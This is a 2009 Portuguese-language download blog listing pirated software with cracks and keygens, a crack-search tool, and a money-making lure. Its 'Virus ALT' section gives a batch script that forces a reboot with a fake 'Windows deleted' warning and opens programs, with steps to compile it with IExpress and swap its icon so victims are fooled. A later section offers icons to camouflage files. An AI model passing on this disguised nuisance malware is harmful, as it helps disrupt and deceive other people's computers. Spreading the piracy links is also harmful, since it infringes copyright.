Isso nao e Virus Galera Ganhe 27 Dolares em Menos de 15Min Confira!

Clikem na imagem qualquer duvida de como ganhar o dim dim mande para o email: Adm-roxx@hotmail.com !

Blog de Downloads segurança em Primeiro Lugar .

Web Page Rox novidades Melhores Antivírus você só encontra na

WeB Page Rox.

Evoluindo com você!


Blog de Downloads não e apenas coisas para baixar por baixar e coisas que vc usa sempre que liga seu Computador desde ANTIVIRUS ate WINDOWS sem (Site ou Blog ) que tenha downloads as pessoas nunca iriam ter nem se quer Msn ou programas avançados

Então por isso resolvi fazer um Blog de Dowloads pq isso é Tudo!

quinta-feira, 9 de abril de 2009

PENCLEAN - REMOVER VÍRUS DE PENDRIVE

O PenClean foi desenvolvido para malwares relacionados a unidades. Muitas pessoas reclamam que ao tentar acessar uma unidade dá um erro assim:

"Copy.exe não pode ser encontrado."
É uma das variações que o PenClean remove.
No atual momento remove as seguintes infecções:
- Win32.Perlovga.a
- W32.Resik.A (Small.i)
- Worm.RJump.A (RavMon/Ravamonlog)
- W32.VB-ATG Trojan
Na versão 2.0.2 ele conta com um sistema de verificação de todas unidades do computador (com excessão do floppy), novas validações e correções de alguns erros.

  • Tamanho: 1 Mb

Clique Aqui Para Baixar

DEEP FREEZE ENTERPRISE 6.30.220.1875 FULL

Deep Freeze Standard é um programa de recuperação de sistema que amplia as suas capacidades e traz muito mais do que o sistema padrão de restauração do Windows pode oferecer, o que o torna uma ferramenta completa de segurança, controle e manutenção do seu computador, ideal para pequenas redes que não precisam de um servidor.

Para isso, ele "limpa" o seu computador toda vez que você reinicia o sistema operacional, restaurando suas configurações originais e acabando com qualquer nova ameaça ou programa indesejado que esteja instalado na sua estação de trabalho.
Isso pode facilitar muito a vida de quem administra computadores públicos e está constantemente envolvido com problemas relacionados ao mau uso das máquinas, além de poder ser usado tranqüilamente por usuários domésticos que não fazem muitas alterações no seu computador.

Estilo: Ferramentas para Sistemas
Desenvolvedor: Consult Net IT Solutions
Tamanho: 88 Mb
Servidor: RapidShare
Formato: .RAR
Idioma: Inglês

Download

ACDSEE PRO 2.5.333

Expor detalhes escondidos em zonas de luz e escuridão ACDSee Pro 2 de patente pendente Shadow / Destaques recurso - você verá belos resultados. Fix comum fotografia defeitos como manchas, erupções, lente arranhões e outras imperfeições com o Photo Repair ferramenta. NOVO! Usar uma ferramenta de seleção para aplicar ajustes incluindo borrão, saturação e cor para definir áreas de suas fotos.
Apresentar as suas fotos na melhor luz Compartilhe disparos effortlessly selecionados através de e-mail, web galerias, slide shows e estampas.
Use ACDSee Pro 2 da ferramenta de e-mail para otimizar suas imagens para a entrega. Facilmente criar folhas de contato e de alta qualidade com estampas otimizados imprimir modelos.

Estilo: Editor de Imagens
Desenvolvedor: N/A
Tamanho: 35 Mb
Servidor: RapidShare
Formato: .RAR
Idioma: Inglês

Download

WEBSITE COPY PROTECTION 7.2.1.0 + KEYGEN

Descrição
Proteja seu Web site do código HTML e design de roubo usando este fácil de usar o programa. PageLock codifica HTML de uma maneira que faz com que seja difícil de fazer cópias não autorizadas, enquanto ainda permitindo o webpage resultante para ser exibido em um navegador compatível JavaScript sem perturbações do seu design. PageLock também oferece opções para a prevenção de texto a ser seleccionado o botão direito do mouse e ser clicado. Proteja sua página web do código e design de cópias não autorizadas utilizando PageLock Website Copy Protection. Esse o premiado software ajuda a bloquear site copiando a parar a partir de texto a ser seleccionados e prevenir a página web do código fonte de ser lido.

Informações
Tamanho: 530 kb
Formato: rar
Idioma: Inglês

EasyShare

ANTI TROJAN ELITE V4.1.3

Anti Trojan Elite limpa arquivos usados por hackers, incluindo trojans, spywares e por aí vai. Possui gerenciamento de sistema, controlando portas UDP e TCP/IP e mapeando aplicativos. Descarregue módulos, otimize o sistema, repare ferramentas e muito mais.

Estilo: Anti-vírus
Fabricante: ISecSoft Inc.
Tamanho: 6 Mb
Formato: Rar
Idioma: Inglês
Servidores: Easy-Share ou Rapid-Share

Free download br Free download br

JDOWNLOADER 1.921 | BAIXE FACILMENTE DO RAPIDSHARE E MEGAUPLOAD

Descrição: JDownloader Download Manager baixa arquivos do RapidShare e MegaUpload.com. É uma ferramenta open-source e totalmente escrita em Java. Compativel com RapidShare e MegaUpload tanto para utilizadores premium como gratuitos. Vale Conferir. TESTADO E APROVADO!!!

»Informações
Estilo: Programa
Tamanho: 4,7 MB
Formato: Rar
Idioma: Inglês
Servidores: Easy-Share/Rapidsahre
Easy-Share Rapidshare

TEAMVIEWER 3.6.4756 (ÒTIMO PROGRAMA)


TeamViewer é um programa para computação remota. Com ele os usuários podem compartilhar, remotamente, áreas de trabalho, podendo transferir arquivos, controlar aplicativos ou o que você desejar.

A conexão com o computador remoto é rápida, basta rodar o programa nos dois computadores, iniciá-lo e digitar o ID, o computador que será controlado armazenará uma lista de IDs que são permitidos.

A conexão remota é criptografada, isso para aumentar a segurança e evitar que pessoas sem autorização acessem suas informações.

Ou seja:vc vai bisbilhotar o pc dos outros,podendo atê mexer nele normal,mas é claro que a pessoa terá de passar sua senha,pra q vc possa compartilhar o pc!

»Informações
Estilo: Aplicativos
Tamanho: 1,5 MB
Formato: Rar
Servidores: Easy-Share/Bitroad

Easy-Share BitRoad

GIZMO (LIGAÇÕES DE GRAÇA PARA FIXO E CELULARES )


Descrição :

Que tal fazer ligações quanto quiser apartir do microfone ?Ligue pra quem você quiser celular,fixo,DDD e DDI .

Informações :

Tamanho : 11,5 Mb
Idioma : Inglês
Servidor : Bitroad



Free download br

PROPHECYMASTER V.1.0 | COMO VOCÊ VAI FICAR DAQUI 20 ANOS?


Ansioso para ver o futuro? Não quer esperar vinte anos para ver como você ou seus amigos estarão! Uma única foto é tudo que você precisa . Apenas coloque seu retrato no ProphecyMaster, e veja sua cara envelhecida imediatamente. Programa excelente, testado e aprovado. Vale Conferir!!!

Tamanho: 4.8 Mb
Hospedagem: EasyShare/Bitroad

Download Easy-ShareBitroad

CRACKDOWNLOADER PLUS 2.2 | BAIXE CRACKS E SERIAIS COM APENAS UM CLIQUE


Que tal um programa que busca cracks e seriais com apenas um clique. CrackDownloader faz isso e muito mais, seguro e rapido de usar!!! Vale Conferir!!!

Tamanho: 1 MB
Hospedagem: EasyShare/Bitroad

Download Easy-ShareBitroad

SONY VEGAS MOVIE STUDIO 8.0C BUILD 142 + PATCH ( CRACK SERIAL )



Nome:
Sony Vegas Movie Studio 8.0c Build 142
Fabricante: Sony
Sistema Operacional:Windows
Estilo: Ultilitários

O Vegas Movie Studio tem a capacidade de editar trilhas ilimitadas de áudio e vídeo no seu computador: o único limite será o poderio da sua máquina. Quem trabalha no ramo sabe muito bem que, para processos rápidos e resultados eficazes, é preciso ter um excelente e turbinado PC.

O programa permite pré-visualizações externas, via Firewire ou via conversão em tempo real de HD para SD, tornando assim possível a visualização do material em qualquer outro monitor externo.

Informações
Tamanho:
79,2MB
Formato: RAR

Links para baixar
MegaUpload

Badongo

Netload

Depositfiles

Uploaded

Crack: incluso no rar

ADOBE FLASH CS4 PROFESSIONAL

Adobe Flash CS4 Professional oferece um software completamente renovado enfoque sobre a facilidade de utilização. Um objeto com base em modelo animação em Flash torna o trabalho mais acessível e de igual modo mais produtivo. Ajustar rapidamente horários sem quebrar tweens, modificar moção caminhos utilizando curvas de Bezier, e tweak atributos como rotação, tamanho e cor de forma independente.
Poderosas ferramentas como o novo desenho em 3D de Tradução e 3D Rotation, Bones, Deco e abrir as portas para novas possibilidades criativas. Unrivaled como uma ferramenta de desenho interativo, o Flash CS4 é um lugar para fazer isso todos juntos importação de conteúdos de outros sotware criativo e trabalhar sem problemas com outros produtos Adobe para criar experiências inspiradoras que ir apenas aproximadamente em qualquer lugar. Utilize o Adobe Media Encoder para integrar vídeo H.264 de alta deinition atingir amplas audiências se você voltar a publicar conteúdo de um navegador, um dispositivo móvel, ou diretamente para a área de trabalho com o Adobe AIR. Muito mais do que qualquer lançamento anterior, Flash CS4 permite que profissionais criativos para trazer idéias para novas formas de vida.



Easy-share
todas as postagens

WinRAR Vista Ultimate


Deixe o seu programa WinRAR com ícones da barra de ferramenta iguais aos do Windows Vista.

WinRAR Vista Ultimate é um tema para o compactador/descompatador de arquivos WinRAR, que o deixará com um visual bastante semelhante ao do Windows Vista.

Na verdade, o que muda aqui são somente os botões da barra de ferramentas do programa, que deixam de ser como o padrão e passam a ser grandes, semelhantes aos ícones do Vista.

Mude a cara do seu WinRAR

No Windows Vista, basta abrir o arquivo para que ele seja automaticamente instalado. Depois disso, para ativá-lo, abra o WinRAR e vá em Opções > Temas > Vista Ultimate 64x64. A partir de então, novos ícones aparecerão em sua barra de ferramenta, maiores e mais modernos que os antigos, dando ao seu programa uma cara diferente.

Além dos ícones na barra de ferramentas, mudará também o ícone dos arquivos reconhecidos pelo WinRAR, que também passarão a seguir um modelo semelhante ao do Windows Vista. Com certeza, se você já usa este sistema operacional, estes novos ícones ficarão totalmente de acordo com ele.




Virus ALT





PRIMEI PARA PODER CRIAR ESTE VIRUS ALT VOCÊ TERA QUE FAZER OS SEGUINTES COMANDOS

VAI NO BLOCO DE NOTAS E COLOQUE ESTE CODIGO ABAIXO

@echo off
shutdown -R -c ="WINDWOS DELETADO" -T 15

goto hack:
windows delete

start http://www.google.com.br
start notepad.exe
start cmd.exe
start wmplayer.exe

exit

e salva com qualquer nome que você querer mais coma extenção (.bat)

ai vai em Iniciar→→Executar→→ Digite →→ Iexpress e Compila Ele!

Baixe o Paxk De icones E O Resource hacker E Troque o Icone Do Surgimento do Compiler


COMUNIDADE DO ORKUT CONHECIMENTOS!

ICONES



Icones eses Icones Você podera Usalos para personalizar uma pasta Um Progra

Ou Até camuflar Aquivos para Outras Pessoal não descobrirem



E Para baixalo clicke no botão abaixo escrito downlaod!


Multi - Dicionário Eletrônico MICHAELIS - Português, Inglês, Espanhol

Descrição: MULTI DICIONÁRIO MICHAELIS
- Tradução dos Verbetes em Português
- Espanhol - Português
- Português - Espanhol
- Português Inglês
- Sinonimos e Antonimos
- Conjugação de Verbos
- Glossário - Executivo
- Glossário - Informática
- Português - Português
- Informática- Executivo

Informações:

Hospedagem: Easyshare
Tamanho: 15 Mb
Formato: RAR

Download:


EasyShare">Programas

0 comentários:

 
© 2009 Template feito por DownLivre